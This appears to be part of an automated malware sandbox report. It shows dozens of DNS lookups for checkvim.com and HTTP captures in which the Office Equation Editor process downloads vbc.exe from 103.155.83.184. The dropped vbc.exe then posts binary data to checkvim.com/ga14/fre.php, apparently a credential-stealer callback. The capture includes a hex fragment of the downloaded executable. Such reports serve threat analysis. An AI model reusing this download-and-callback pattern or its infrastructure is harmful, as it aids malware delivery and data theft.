                    Sep 28, 2021 06:51:55.483758926 CEST192.168.2.228.8.8.80xff5eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:56.264363050 CEST192.168.2.228.8.8.80x37edStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:56.878813028 CEST192.168.2.228.8.8.80xff2fStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:57.643562078 CEST192.168.2.228.8.8.80xd3e9Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:58.263293982 CEST192.168.2.228.8.8.80x75c9Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:58.883229017 CEST192.168.2.228.8.8.80x7d4aStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:59.524702072 CEST192.168.2.228.8.8.80xae13Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:00.126727104 CEST192.168.2.228.8.8.80xc359Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:00.767751932 CEST192.168.2.228.8.8.80x13b0Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:01.459906101 CEST192.168.2.228.8.8.80xc0feStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:02.086131096 CEST192.168.2.228.8.8.80x3493Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:02.770040989 CEST192.168.2.228.8.8.80x4ff9Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:03.436384916 CEST192.168.2.228.8.8.80x3405Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:04.040453911 CEST192.168.2.228.8.8.80x9b70Standard query (0)checkvim.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Sep 28, 2021 06:50:29.499205112 CEST8.8.8.8192.168.2.220xe7f9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:30.158834934 CEST8.8.8.8192.168.2.220xa67bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:30.708821058 CEST8.8.8.8192.168.2.220x3958No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:31.417036057 CEST8.8.8.8192.168.2.220x5f12No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:33.511215925 CEST8.8.8.8192.168.2.220x9ca6No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:36.260610104 CEST8.8.8.8192.168.2.220xe8f3No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:36.909889936 CEST8.8.8.8192.168.2.220x1942No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:37.536830902 CEST8.8.8.8192.168.2.220xca69No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:38.180830956 CEST8.8.8.8192.168.2.220x120bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:38.891587973 CEST8.8.8.8192.168.2.220x6d9bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:39.563527107 CEST8.8.8.8192.168.2.220x1ddNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:40.244230032 CEST8.8.8.8192.168.2.220xc75bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:40.888323069 CEST8.8.8.8192.168.2.220xb758No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:41.560283899 CEST8.8.8.8192.168.2.220x573No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:42.224773884 CEST8.8.8.8192.168.2.220x47cdNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:42.881131887 CEST8.8.8.8192.168.2.220x2585No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:43.582062006 CEST8.8.8.8192.168.2.220xe128No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:44.243088961 CEST8.8.8.8192.168.2.220x7c94No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:44.913645983 CEST8.8.8.8192.168.2.220x22e6No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:45.527900934 CEST8.8.8.8192.168.2.220xaf08No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:46.180366993 CEST8.8.8.8192.168.2.220xe7edNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:46.855447054 CEST8.8.8.8192.168.2.220xb5d5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:47.487868071 CEST8.8.8.8192.168.2.220x4469No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:48.142239094 CEST8.8.8.8192.168.2.220x27fcNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:48.814738035 CEST8.8.8.8192.168.2.220x27afNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:49.475914955 CEST8.8.8.8192.168.2.220x5bccNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:50.121701002 CEST8.8.8.8192.168.2.220x584dNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:50.756259918 CEST8.8.8.8192.168.2.220x7e52No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:51.593106031 CEST8.8.8.8192.168.2.220xc11No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:52.364711046 CEST8.8.8.8192.168.2.220x54a8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:53.292803049 CEST8.8.8.8192.168.2.220x1a9bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:53.947679043 CEST8.8.8.8192.168.2.220xedb1No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:54.610177994 CEST8.8.8.8192.168.2.220xdf9eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:55.233603954 CEST8.8.8.8192.168.2.220x113eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:55.914731026 CEST8.8.8.8192.168.2.220x8cc3No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:56.553797007 CEST8.8.8.8192.168.2.220xbae2No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:57.208435059 CEST8.8.8.8192.168.2.220xf818No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:57.814928055 CEST8.8.8.8192.168.2.220x90bcNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:58.513585091 CEST8.8.8.8192.168.2.220xd685No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:59.156528950 CEST8.8.8.8192.168.2.220x2384No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:59.811640024 CEST8.8.8.8192.168.2.220xfc87No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:00.464709044 CEST8.8.8.8192.168.2.220xd67aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:01.118602991 CEST8.8.8.8192.168.2.220xa7e8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:01.787070036 CEST8.8.8.8192.168.2.220xd14No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:02.437361002 CEST8.8.8.8192.168.2.220x916fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:03.081188917 CEST8.8.8.8192.168.2.220xbbb4No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:03.737246037 CEST8.8.8.8192.168.2.220x3d1No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:04.384134054 CEST8.8.8.8192.168.2.220xe82eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:05.019469976 CEST8.8.8.8192.168.2.220x5705No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:05.631485939 CEST8.8.8.8192.168.2.220x3e25No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:06.246737957 CEST8.8.8.8192.168.2.220x70b4No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:06.881524086 CEST8.8.8.8192.168.2.220x7f95No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:07.525409937 CEST8.8.8.8192.168.2.220x7633No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:08.162851095 CEST8.8.8.8192.168.2.220x264cNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:08.768567085 CEST8.8.8.8192.168.2.220x3cd3No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:09.376465082 CEST8.8.8.8192.168.2.220xa48dNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:10.008641958 CEST8.8.8.8192.168.2.220xde0eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:10.613387108 CEST8.8.8.8192.168.2.220xb4f5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:11.259166002 CEST8.8.8.8192.168.2.220x8c7bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:11.848179102 CEST8.8.8.8192.168.2.220xab7bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:12.473819017 CEST8.8.8.8192.168.2.220x7ce5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:13.111699104 CEST8.8.8.8192.168.2.220x7348No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:13.746982098 CEST8.8.8.8192.168.2.220xba52No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:14.354599953 CEST8.8.8.8192.168.2.220x23e2No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:14.985114098 CEST8.8.8.8192.168.2.220x4ed0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:15.652194977 CEST8.8.8.8192.168.2.220xd6d7No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:16.271156073 CEST8.8.8.8192.168.2.220x76b5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:16.878494978 CEST8.8.8.8192.168.2.220x4a4dNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:17.515573025 CEST8.8.8.8192.168.2.220x65eeNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:18.112341881 CEST8.8.8.8192.168.2.220x718bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:18.758816957 CEST8.8.8.8192.168.2.220x83b4No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:19.371682882 CEST8.8.8.8192.168.2.220x62c8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:20.010968924 CEST8.8.8.8192.168.2.220xb755No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:20.662913084 CEST8.8.8.8192.168.2.220xdbbbNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:21.281076908 CEST8.8.8.8192.168.2.220x2fbeNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:21.908377886 CEST8.8.8.8192.168.2.220xccbeNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:22.536520004 CEST8.8.8.8192.168.2.220x113eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:23.187026024 CEST8.8.8.8192.168.2.220xe199No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:23.800335884 CEST8.8.8.8192.168.2.220x3f8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:24.439459085 CEST8.8.8.8192.168.2.220x4107No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:25.053002119 CEST8.8.8.8192.168.2.220x74acNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:25.677412033 CEST8.8.8.8192.168.2.220xe2bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:26.308763981 CEST8.8.8.8192.168.2.220xa16aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:26.982305050 CEST8.8.8.8192.168.2.220x9490No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:27.600348949 CEST8.8.8.8192.168.2.220xc414No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:28.193268061 CEST8.8.8.8192.168.2.220x7ac6No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:28.808218002 CEST8.8.8.8192.168.2.220x132cNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:29.410531044 CEST8.8.8.8192.168.2.220x4a40No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:30.026681900 CEST8.8.8.8192.168.2.220xce0aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:30.642488003 CEST8.8.8.8192.168.2.220x26a4No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:31.277529955 CEST8.8.8.8192.168.2.220xfbb5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:31.911752939 CEST8.8.8.8192.168.2.220xfb02No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:32.569732904 CEST8.8.8.8192.168.2.220x7463No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:33.175820112 CEST8.8.8.8192.168.2.220x214eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:33.823859930 CEST8.8.8.8192.168.2.220x4df1No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:34.446486950 CEST8.8.8.8192.168.2.220xdb50No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:35.073288918 CEST8.8.8.8192.168.2.220x2a25No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:35.688777924 CEST8.8.8.8192.168.2.220x64feNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:36.340655088 CEST8.8.8.8192.168.2.220x785No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:36.977107048 CEST8.8.8.8192.168.2.220xbf3cNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:37.583689928 CEST8.8.8.8192.168.2.220x3eeaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:38.227706909 CEST8.8.8.8192.168.2.220xfb53No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:38.848547935 CEST8.8.8.8192.168.2.220xeff0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:39.471940994 CEST8.8.8.8192.168.2.220x2267No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:40.437524080 CEST8.8.8.8192.168.2.220x97dfNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:41.041893959 CEST8.8.8.8192.168.2.220x7445No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:41.645601034 CEST8.8.8.8192.168.2.220x83b1No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:42.304616928 CEST8.8.8.8192.168.2.220x1e7fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:42.928423882 CEST8.8.8.8192.168.2.220x8815No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:43.525496006 CEST8.8.8.8192.168.2.220xe640No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:44.146752119 CEST8.8.8.8192.168.2.220x2d16No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:44.785208941 CEST8.8.8.8192.168.2.220x716fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:45.422796011 CEST8.8.8.8192.168.2.220xc08No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:46.027328968 CEST8.8.8.8192.168.2.220x6ceaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:46.652699947 CEST8.8.8.8192.168.2.220x30eaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:47.281250000 CEST8.8.8.8192.168.2.220x1d51No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:47.912065029 CEST8.8.8.8192.168.2.220x6008No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:48.542418957 CEST8.8.8.8192.168.2.220xd582No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:49.182720900 CEST8.8.8.8192.168.2.220xb3eaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:49.812793970 CEST8.8.8.8192.168.2.220xbbd0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:50.428427935 CEST8.8.8.8192.168.2.220x21ceNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:51.094007015 CEST8.8.8.8192.168.2.220x5fe2No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:51.785337925 CEST8.8.8.8192.168.2.220xcfa8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:52.404402971 CEST8.8.8.8192.168.2.220x46c7No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:53.032078981 CEST8.8.8.8192.168.2.220xc0b8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:53.652053118 CEST8.8.8.8192.168.2.220x8d66No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:54.266855001 CEST8.8.8.8192.168.2.220xa872No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:54.898588896 CEST8.8.8.8192.168.2.220xaaacNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:55.501737118 CEST8.8.8.8192.168.2.220xff5eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:56.284024954 CEST8.8.8.8192.168.2.220x37edNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:56.897857904 CEST8.8.8.8192.168.2.220xff2fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:57.662775040 CEST8.8.8.8192.168.2.220xd3e9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:58.280199051 CEST8.8.8.8192.168.2.220x75c9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:58.900548935 CEST8.8.8.8192.168.2.220x7d4aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:59.543994904 CEST8.8.8.8192.168.2.220xae13No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:00.146327972 CEST8.8.8.8192.168.2.220xc359No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:00.787919998 CEST8.8.8.8192.168.2.220x13b0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:01.479352951 CEST8.8.8.8192.168.2.220xc0feNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:02.105777979 CEST8.8.8.8192.168.2.220x3493No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:02.789148092 CEST8.8.8.8192.168.2.220x4ff9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:03.457667112 CEST8.8.8.8192.168.2.220x3405No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:04.060210943 CEST8.8.8.8192.168.2.220x9b70No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • 103.155.83.184
                    • checkvim.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249165103.155.83.18480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:21.338944912 CEST0OUTGET /wdc/vbc.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 103.155.83.184
                    Connection: Keep-Alive
                    Sep 28, 2021 06:50:21.629554033 CEST1INHTTP/1.1 200 OK
                    Date: Tue, 28 Sep 2021 04:50:21 GMT
                    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
                    Last-Modified: Mon, 27 Sep 2021 22:15:04 GMT
                    ETag: "33600-5cd016dd19714"
                    Accept-Ranges: bytes
                    Content-Length: 210432
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdownload
                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 48 ba 15 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6c 01 00 00 14 0a 00 00 00 00 00 18 1b 00 00 00 10 00 00 00 80 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 0b 00 00 04 00 00 6d 6b 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 b1 01 00 4f 00 00 00 2c a9 01 00 3c 00 00 00 00 20 0a 00 b8 75 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 81 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 94 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 6a 01 00 00 10 00 00 00 6c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ef 31 00 00 00 80 01 00 00 32 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 55 08 00 00 c0 01 00 00 1e 00 00 00 a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 75 01 00 00 20 0a 00 00 76 01 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH`l@mkO,< u@|.text jl `.rdata12p@@.data|U@.rsrcu v@@


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.22491665.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:29.583741903 CEST220OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 176
                    Connection: close
                    Sep 28, 2021 06:50:29.928668976 CEST220INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:41 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
